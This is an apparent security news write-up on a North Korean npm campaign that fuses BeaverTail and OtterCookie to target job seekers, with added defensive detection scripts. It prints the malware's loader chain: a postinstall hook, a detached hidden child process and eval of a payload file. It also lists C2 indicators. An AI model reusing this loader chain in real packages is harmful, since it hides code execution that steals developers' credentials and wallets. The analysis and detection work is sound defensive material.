In a recent cybersecurity development, North Korean state-sponsored hackers have been identified utilizing a sophisticated malware campaign that combines two previously distinct tools—BeaverTail and OtterCookie—into a single, potent JavaScript payload. This campaign specifically targets job seekers by distributing a trojanized Node.js application named Chessfi through a modified npm package hosted on the official repository.
Infection Mechanism
The attack begins with victims being lured through fraudulent employment offers. As part of a supposed coding assessment, they are instructed to install the Chessfi application. Unbeknownst to them, this action triggers malicious scripts designed to harvest sensitive information, including credentials, cryptocurrency wallets, and user activity data.
Cisco Talos analysts uncovered this campaign while investigating unusual outbound traffic from a compromised system. They discovered that a post-installation script within the `node-nvm-ssh` package initiates a concealed child process. This process deobfuscates and executes a substantial JavaScript payload that integrates functionalities from both BeaverTail and OtterCookie.
Malware Capabilities
Once executed, the combined malware establishes a connection to a command-and-control (C2) server using the socket.io library. This connection enables attackers to remotely issue commands, exfiltrate files matching specific patterns (such as `.env` and `.docx` files, as well as directories associated with cryptocurrency extensions), and execute shell commands on the infected system.
A particularly concerning feature of this malware is its keylogging capability. The keylogging component captures every keystroke made by the user and takes periodic desktop screenshots. This data is then uploaded to the C2 server along with clipboard contents, providing attackers with comprehensive insight into the victim’s activities.
Technical Details
Infected systems exhibit sustained network activity on high-numbered TCP ports, commonly port 1418 for socket.io communications and port 1478 for keylog data uploads. The malware creates a temporary folder named `windows-cache`, where it writes keystrokes to a file named `1.tmp` every second and saves screenshots as `2.jpeg` every four seconds.
Utilizing Node.js packages such as `node-global-key-listener`, `screenshot-desktop`, and `sharp`, the malware configures listeners for keyboard events and schedules screenshot captures. It then bundles and sends this data to the C2 server at `hxxp://172.86.88.188:1478/upload`.
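As an added example (not code from the Talos report), the following turns the indicators above into detection logic over constructed inputs: file-write events from a host activity log and netstat-style connection rows. The temp path, timestamps and sample rows are assumed values; the ports and C2 host come from the report.

```javascript
// Added example (not code from the Talos report): flag the host and network
// artifacts described above, from two constructed inputs: file-write events
// (path + unix time) and netstat-style connection rows. The cadence check
// catches the 1-second keystroke flush and 4-second screenshot loop even if
// the folder name changes; the port/IP check uses the report's indicators.
const C2_PORTS = new Set([1418, 1478]); // socket.io C2 and keylog upload
const C2_HOST = '172.86.88.188'; // host from the report's upload URL
// Median gap in seconds between successive writes to one path.
function medianInterval(times) {
  const gaps = times.slice(1).map((t, i) => t - times[i]).sort((a, b) => a - b);
  return gaps.length ? gaps[Math.floor(gaps.length / 2)] : Infinity;
}
// events: [{ path, ts }] from any file-activity log; ts in seconds.
function detectCaptureLoops(events) {
  const byPath = new Map();
  for (const e of events) byPath.set(e.path, [...(byPath.get(e.path) || []), e.ts]);
  const alerts = [];
  for (const [p, ts] of byPath) {
    if (ts.length < 4) continue; // need several writes to judge cadence
    const gap = medianInterval(ts.sort((a, b) => a - b));
    const inCache = /[\\/]windows-cache[\\/]/i.test(p);
    if (/1\.tmp$/i.test(p) && Math.abs(gap - 1) <= 0.25)
      alerts.push({ path: p, reason: 'keystroke file rewritten every ~1s', inCache });
    if (/2\.jpe?g$/i.test(p) && Math.abs(gap - 4) <= 0.5)
      alerts.push({ path: p, reason: 'screenshot rewritten every ~4s', inCache });
  }
  return alerts;
}
// rows: "proto local remote state", as printed by `netstat -an`.
function detectC2Connections(rows) {
  const alerts = [];
  for (const row of rows) {
    const m = row.match(/^tcp\S*\s+\S+\s+(\S+):(\d+)\s+(\w+)/i);
    if (!m) continue;
    const [, host, port, state] = m;
    if (host === C2_HOST) alerts.push({ remote: `${host}:${port}`, reason: 'known C2 host' });
    else if (C2_PORTS.has(Number(port)) && state === 'ESTABLISHED')
      alerts.push({ remote: `${host}:${port}`, reason: `established session on C2 port ${port}` });
  }
  return alerts;
}
// Constructed samples: 1.tmp written every 1s, 2.jpeg every 4s, two C2 rows.
const TMP = 'C:\\Users\\u\\AppData\\Local\\Temp\\windows-cache\\'; // constructed path
const SAMPLE_EVENTS = [...Array(8)].map((_, i) => ({ path: TMP + '1.tmp', ts: 1700000000 + i }))
  .concat([...Array(4)].map((_, i) => ({ path: TMP + '2.jpeg', ts: 1700000000 + 4 * i })));
const SAMPLE_ROWS = ['tcp  10.0.0.5:52311  172.86.88.188:1418  ESTABLISHED',
  'tcp  10.0.0.5:52340  172.86.88.188:1478  TIME_WAIT', 'tcp  10.0.0.5:52399  203.0.113.10:443  ESTABLISHED'];
```

The cadence rule is the more durable of the two, since a C2 address or port is trivially changed between campaigns while the capture loop timing is baked into the payload.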
Evasion Techniques
The infection mechanism employs a multi-stage chain to evade detection. After the victim clones the repository, a malicious `postinstall` script in the `package.json` file executes the `skip` script:
```json
"scripts": {
  "postinstall": "npm run test && npm run transpile && npm run skip"
}
```
The `skip` command invokes `node testfixtures/eval`, which by default loads `index.js`. This script spawns a detached child process running `file15.js`:
```javascript
const path = require('path');
const { spawn } = require('child_process');
// Launch file15.js under the same Node binary as a detached, silent child.
const filePath = path.join(__dirname, 'node_modules', 'file15.js');
const child = spawn(process.execPath, [filePath], { detached: true, stdio: 'ignore' });
```
Finally, `file15.js` reads and evaluates the content of `test.list` using `eval`, revealing the combined BeaverTail and OtterCookie modules:
```javascript
const fs = require('fs');
const path = require('path');
const filePath = path.join(__dirname, 'test.list');
fs.readFile(filePath, 'utf8', (err, data) => { eval(data); });
```
This intricate infection chain—comprising repository cloning, execution of seemingly benign npm scripts, spawning of hidden processes, and dynamic evaluation of obfuscated payloads—underscores the sophisticated tactics employed by the attackers.
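One way to catch this chain before it runs is to audit a package's lifecycle scripts offline. The block below is an added example, not code from the report or the trojanized package: it follows `npm run` chains out of the install hooks and scans the files they reach for the spawn-and-eval pattern described above. The package.json and source snippets are constructed stand-ins.

```javascript
// Added example (not code from the Talos report or the trojanized package): audit
// an npm package's install-time scripts before "npm install". It follows "npm run"
// chains out of the lifecycle hooks and scans the JS files those scripts reach (and
// any .js file they name) for process spawning and eval of file contents.
// The package.json and sources below are constructed stand-ins.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];
const RISKY = [
  { re: /\beval\s*\(|new\s+Function\s*\(/, why: 'eval of dynamic data' },
  { re: /child_process|\bspawn\s*\(/, why: 'spawns a process' },
  { re: /detached\s*:\s*true/, why: 'detached (hidden) child process' },
];
// Every script name reachable from `name` through "npm run <other>".
function resolveChain(scripts, name, seen = new Set()) {
  if (seen.has(name) || !scripts[name]) return seen;
  seen.add(name);
  for (const m of scripts[name].matchAll(/npm\s+run\s+([\w:-]+)/g)) resolveChain(scripts, m[1], seen);
  return seen;
}
// Scan one file, then recurse into any .js path it mentions as a string literal.
function scanFile(files, target, seen, findings, hook) {
  const src = files[target];
  if (src === undefined || seen.has(target)) return;
  seen.add(target);
  const hits = RISKY.filter((r) => r.re.test(src)).map((r) => r.why);
  if (hits.length) findings.push({ hook, file: target, hits });
  for (const m of src.matchAll(/['"]([\w.\/-]+\.js)['"]/g)) scanFile(files, m[1], seen, findings, hook);
}
// pkgText: package.json text; files: { relativePath: source } from the unpacked tarball.
function auditPackage(pkgText, files) {
  const scripts = JSON.parse(pkgText).scripts || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS.filter((h) => scripts[h])) {
    const chain = [...resolveChain(scripts, hook)];
    findings.push({ hook, chain, command: scripts[hook] });
    const seen = new Set();
    for (const name of chain) {
      for (const m of scripts[name].matchAll(/\bnode\s+([^\s&|;]+)/g)) // "node dir" loads dir/index.js
        scanFile(files, m[1].endsWith('.js') ? m[1] : `${m[1]}/index.js`, seen, findings, hook);
    }
  }
  return findings;
}
const SAMPLE_PKG = JSON.stringify({ scripts: { test: 'echo ok', transpile: 'echo ok',
  postinstall: 'npm run test && npm run transpile && npm run skip', skip: 'node testfixtures/eval' } });
const SAMPLE_FILES = {
  'testfixtures/eval/index.js': "const { spawn } = require('child_process');\n" +
    "spawn(process.execPath, ['node_modules/file15.js'], { detached: true, stdio: 'ignore' });",
  'node_modules/file15.js': "fs.readFile('test.list', 'utf8', (err, data) => { eval(data); });",
};
```

Feed it the contents of the tarball produced by `npm pack` rather than an installed tree, and when such an audit is not possible install with `npm install --ignore-scripts` so lifecycle hooks never run.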
Background on BeaverTail and OtterCookie
BeaverTail is a JavaScript-based stealer and loader that has been previously used to target software developers. It is known for its ability to steal browser login credentials, gather system data, and list cryptocurrency wallet extensions in targeted browsers. In some instances, BeaverTail has been used to download additional malware components, such as the Python-based backdoor known as InvisibleFerret.
OtterCookie, on the other hand, is a sophisticated malware attributed to the North Korean threat actor WaterPlum (also known as Famous Chollima or PurpleBravo). It has been observed targeting financial institutions, cryptocurrency operators, and FinTech companies worldwide. OtterCookie’s capabilities include remote shell access, file exfiltration, clipboard monitoring, and keylogging. Its cross-platform functionality allows it to operate on Windows, Linux, and macOS systems.
Implications and Recommendations
The fusion of BeaverTail and OtterCookie into a single payload signifies a strategic evolution in cyber-espionage tactics, particularly in targeting individuals through social engineering. By exploiting the trust inherent in job recruitment processes, attackers can effectively infiltrate systems and exfiltrate sensitive information.
To mitigate the risks associated with such sophisticated attacks, individuals and organizations are advised to:
– Exercise Caution with Unsolicited Job Offers: Be wary of unexpected job offers, especially those that require the installation of software or participation in coding assessments involving unfamiliar applications.
– Verify the Authenticity of Software Packages: Before installing any software, especially from open-source repositories, verify the authenticity and integrity of the package. Check for signs of tampering or unusual activity associated with the package.
– Implement Robust Endpoint Protection: Utilize comprehensive endpoint detection and response (EDR) solutions to monitor and respond to suspicious activities on devices.
– Educate Employees on Social Engineering Tactics: Conduct regular training sessions to raise awareness about social engineering tactics and phishing schemes. Educated employees are less likely to fall victim to such attacks.
– Regularly Update and Patch Systems: Ensure that all systems and software are up to date with the latest security patches to protect against known vulnerabilities.
By adopting these proactive measures, individuals and organizations can enhance their defenses against the evolving landscape of cyber threats posed by state-sponsored actors.